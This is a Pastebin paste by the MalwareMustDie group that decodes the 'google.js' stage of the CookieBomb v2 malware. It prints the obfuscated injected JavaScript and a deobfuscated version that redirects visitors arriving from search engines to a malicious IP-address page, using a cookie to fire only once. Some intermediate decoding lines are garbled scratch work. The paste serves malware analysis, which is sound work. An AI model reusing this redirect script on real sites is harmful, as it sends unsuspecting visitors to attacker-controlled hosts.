SHARE
TWEET

CookieBomb v2 | the 2nd cushion: Google.JS

MalwareMustDie Jan 29th, 2014 418 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie!!
  2. // Decoding pad for the CookieBomb v2 's google.js cushion second cushiopn
  3. // <unixfreaxjp> date
  4. // sendak.freenode.net  Thursday January 30 2014 -- 06:30:38 +02:00
  5. // [01:30pm][unixfreaxjp(+iw)] [##******st(+nst)]   [Act: 1]
  6. // thanks: jaja*** wire**
  7.  
  8. var _0xe2b8=["\x72\x65\x66\x65\x72\x72\x65\x72","\x67\x6F\x6F\x67\x6C\x65","\x79\x61\x68\x6F\x6F","\x62\x69\x6E\x67","\x79\x61\x6E\x64\x65\x78","\x62\x61\x69\x64\x75","\x67\x69\x67\x61\x62\x6C\x61\x73\x74","\x73\x6F\x73\x6F","\x62\x6C\x65\x6B\x6B\x6F","\x65\x78\x61\x6C\x65\x61\x64","\x73\x6F\x67\x6F\x75","\x64\x75\x63\x6B\x64\x75\x63\x6B\x67\x6F","\x76\x6F\x6C\x75\x6E\x69\x61","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x32\x33\x39\x2E\x31\x35\x2E\x36\x31\x2F\x67\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x20","\x3D","\x3B","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x72\x65\x66\x65\x72\x72\x65\x72\x52\x65\x64\x69\x72\x65\x63\x74\x43\x6F\x6F\x6B\x69\x65","\x64\x6F\x20\x6E\x6F\x74\x20\x72\x65\x64\x69\x72\x65\x63\x74"];
  9.  
  10. var from=document[_0xe2b8[0]];var i;var se=[_0xe2b8[1],_0xe2b8[2],_0xe2b8[3],_0xe2b8[4],_0xe2b8[5],_0xe2b8[6],_0xe2b8[7],_0xe2b8[8],_0xe2b8[9],_0xe2b8[10],_0xe2b8[11],_0xe2b8[12]];for(i=0;i<se[_0xe2b8[13]];++i){if(from[_0xe2b8[14]](se[i])+1){if(!checkCookie()){window[_0xe2b8[15]]=_0xe2b8[16];} ;} ;} ;function getCookie(_0xecdex5){var _0xecdex6=document[_0xe2b8[17]];var _0xecdex7=_0xecdex6[_0xe2b8[14]](_0xe2b8[18]+_0xecdex5+_0xe2b8[19]);if(_0xecdex7==-1){_0xecdex7=_0xecdex6[_0xe2b8[14]](_0xecdex5+_0xe2b8[19]);} ;if(_0xecdex7==-1){_0xecdex6=null;} else {_0xecdex7=_0xecdex6[_0xe2b8[14]](_0xe2b8[19],_0xecdex7)+1;var _0xecdex8=_0xecdex6[_0xe2b8[14]](_0xe2b8[20],_0xecdex7);if(_0xecdex8==-1){_0xecdex8=_0xecdex6[_0xe2b8[13]];} ;_0xecdex6=unescape(_0xecdex6[_0xe2b8[21]](_0xecdex7,_0xecdex8));} ;return _0xecdex6;} ;function setCookie(_0xecdex5,_0xecdexa,_0xecdexb){var _0xecdexc= new Date();_0xecdexc[_0xe2b8[23]](_0xecdexc[_0xe2b8[22]]()+_0xecdexb);var _0xecdex6=escape(_0xecdexa)+((_0xecdexb==null)?_0xe2b8[24]:_0xe2b8[25]+_0xecdexc[_0xe2b8[26]]());document[_0xe2b8[17]]=_0xecdex5+_0xe2b8[19]+_0xecdex6;} ;function checkCookie(){var _0xecdexe=getCookie(_0xe2b8[27]);if(_0xecdexe!=null&&_0xecdexe!=_0xe2b8[24]){return true;} else {setCookie(_0xe2b8[27],_0xe2b8[28],730);return false;} ;} ;
  11.  
  12. // beautify the engine parts..
  13.  
  14. var se=[_0xe2b8[1],_0xe2b8[2],_0xe2b8[3],_0xe2b8[4],_0xe2b8[5],_0xe2b8[6],
  15.        _0xe2b8[7],_0xe2b8[8],_0xe2b8[9],_0xe2b8[10],_0xe2b8[11],_0xe2b8[12]];
  16.  
  17.  var
  18.  se=["referrer","google","yahoo","bing","yandex","baidu","gigablast","soso","blekko","exalead","sogou",
  19.  "duckduckgo","volunia","length","indexO
  20.  f","location","http://91.239.15.61/g.php","cookie"," ","=",";","substring","getDate","setDate","",";
  21.  
  22. var _0xe2b8==
  23.    ["referrer","google","yahoo","bing","yandex","baidu",
  24.    "gigablast","soso","blekko","exalead","sogou","duckduckgo",
  25.    "volunia","length","indexOf","location",
  26.    "h00p://91.239.15.61/g.php","cookie"," ","=",";","substring","getDate","setDate","",";
  27.  
  28. // first to last...
  29.  
  30.  
  31.     var se = [ google , yahoo , bing , yandex , baidu , gigablast , soso , blekko , exalead , sogou , duckduckgo , volunia];
  32.     for (i = 0; i < se[length]; ++i) {
  33.         if (from[indexOf](se[i]) + 1) {
  34.             if (!checkCookie()) {
  35.                 window[location] = http://91.239.15.61/g.php;
  36.             };        };    };
  37.  
  38. // debug
  39.  
  40. 03:39AM "cookie",17
  41. 03:39AM " ",18
  42. 03:40AM "=",19
  43. 03:40AM ";",20
  44. 03:40AM "substring",21
  45. 03:40AM "getDate",22
  46. 03:40AM "setDate",23
  47. 03:40AM "",24
  48. 03:40AM "; expires=",25
  49. 03:40AM "toUTCString",26
  50. 03:40AM "referrerRedirectCookie",27
  51. 03:40AM "do not redirect"];var from=document[Referer];var i;var "; expires=",28
  52. 03:40AM "toUTCString",29
  53. 03:40AM "referrerRedirectCookie",30
  54. 03:40AM "do not redirect"31
  55.  
  56.  
  57. // Cookie buff.. decoded...
  58.  
  59.  var from = document.referrer;
  60.  var i;
  61.  var se = ["google", "yahoo", "bing", "yandex", "baidu", "gigablast", "soso",
  62.      "blekko", "exalead", "sogou", "duckduckgo", "volunia"
  63.  ];
  64.  for (i = 0; i < se.length;
  65.      ++i) {
  66.      if (from.indexOf(se[i]) + 1) {
  67.          if (!checkCookie()) {
  68.              window.location = "http://91.239.15.61/g.php";
  69.          }
  70.      }
  71.  }
  72.  
  73.  function getCookie(c_name) {
  74.      var c_value = document.cookie;
  75.      var c_start = c_value.indexOf(" " + c_name + "=");
  76.      if (c_start == -1) {
  77.          c_start = c_value.indexOf(c_name + "=");
  78.      }
  79.      if (c_start == -1) {
  80.          c_value = null;
  81.      } else {
  82.          c_start = c_value.indexOf("=", c_start) + 1;
  83.          var c_end = c_value.indexOf(";
  84.     ", c_start);
  85.          if (c_end == -1) {
  86.              c_end = c_value.length;
  87.          }
  88.          c_value = unescape(c_value.substring(c_start, c_end));
  89.      }
  90.      return c_value;
  91.  }
  92.  
  93.  function setCookie(c_name, value, exdays) {
  94.      var exdate = new Date();
  95.      exdate.setDate(exdate.getDate() + exdays);
  96.      var c_value = escape(value) + ((exdays == null) ? "" : ";
  97.   expires=" + exdate.toUTCString());
  98.      document.cookie = c_name + "=" + c_value;
  99.  }
  100.  
  101.  function checkCookie() {
  102.      var referrerRedirectCookie = getCookie("referrerRedirectCookie");
  103.      if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
  104.          return true;
  105.      } else {
  106.          setCookie("referrerRedirectCookie", "do not redirect", 730);
  107.          return false;
  108.      }
  109.  
  110. ----
  111. #MalwareMustDie!!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top